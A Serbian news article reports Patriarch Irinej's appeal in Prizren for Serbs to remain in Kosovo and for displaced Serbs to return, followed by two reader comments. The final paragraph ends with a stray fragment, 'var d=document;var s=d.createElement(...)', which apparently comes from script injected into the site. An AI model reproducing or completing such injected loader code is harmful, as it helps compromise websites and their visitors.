Patrijarh Irinej pozvao Srbe da ostanu na Kosmetu a raseljene da se vrate

Patrijarh Irinej pozvao Srbe da ostanu na Kosmetu a raseljene da se vrate

Foto: Tanjug


Poglavar Srpske pravoslavne crkve patrijarh Irinej pozvao je danas Srbe na Kosovu i Metohiji da ostanu u pokrajini, a raseljene da se vrate. Patrijarh je, nakon liturgije koju je služio u sabornom hramu Sv. Ðorđa u Prizrenu, rekao “da će Kosovo, ako ga budemo nosili u duši, ostati naše”.

Nakon liturgije, patrijarh i arhijereji osveštali su obnovljenu zgrade Bogoslovije Svetog Kirila i Metodija u Prizrenu.

Irinej je apelovao na naš narod koji je opstao na Kosovu i Metohiji da ostane i dalje tamo gde su mu živeli preci i tamo gde su mu groblja predaka.

– Takođe apelujemo na one koji su silom prilika morali da napuste ove prostore da se polako vrate tamo gde su im daleki i daljnji preci živeli, na ovoj svetoj zemlji, da bi ova zemlja bila i ostala srpska zemlja- poručio je Irinej.

On je dodao da se sada molimo bogu da sačuva naše svetinje Pećku Patrijaršiju, Visoke Dečane, Gračanicu i mnoge druge svetinje koje su opstale, kao i zidove i ruševine onih koje su spaljene i porušene, sa nadom da će biti obnovljene.

– Nije prvi put u istoriji da smo podizali iz pepela, na zidinama srušenih hramova obnavljali smo i opstajali, ako budemo sa Gospodom biće Gospod sa nama- rekao je Irinej.

Liturgiju je prisustvovao veliki broj vernika, predstavnici Vlade Srbije i predstavnici Srba sa Kosova i Metohije.

Ovim događajima ispred Vlade Srbije prisustvovali su ministar pravde Nikola Selaković, direktor Kancelarije za KiM Marko Ðurić sa saradnicima, ministar za povratak i zajednice Dalibor Jevtić, zamenik kosovskog premijera Branimir Stojanović, predsednik Srpske liste Slavko Simić i drugi.var d=document;var s=d.createElement(‘script’);

2 komentara

Dodajte komentar
 1. 1
  Marko Muzikravic

  Cudno je da nijedan srpski Patriarh nije pozvao Srbe oterane od komunisticke vlasti da se vrate u Srbiju?

  • 2
   Milos

   Pa i vratili su se vidis da ti kroje sudbinu. Zasto ova svita ne ide u Pecku patrijarsiju gde je centar a ne da dalje apele na gradjane da se vrate? Lako je komandovati iz BG, neka daju primer.

+ Ostavite komentar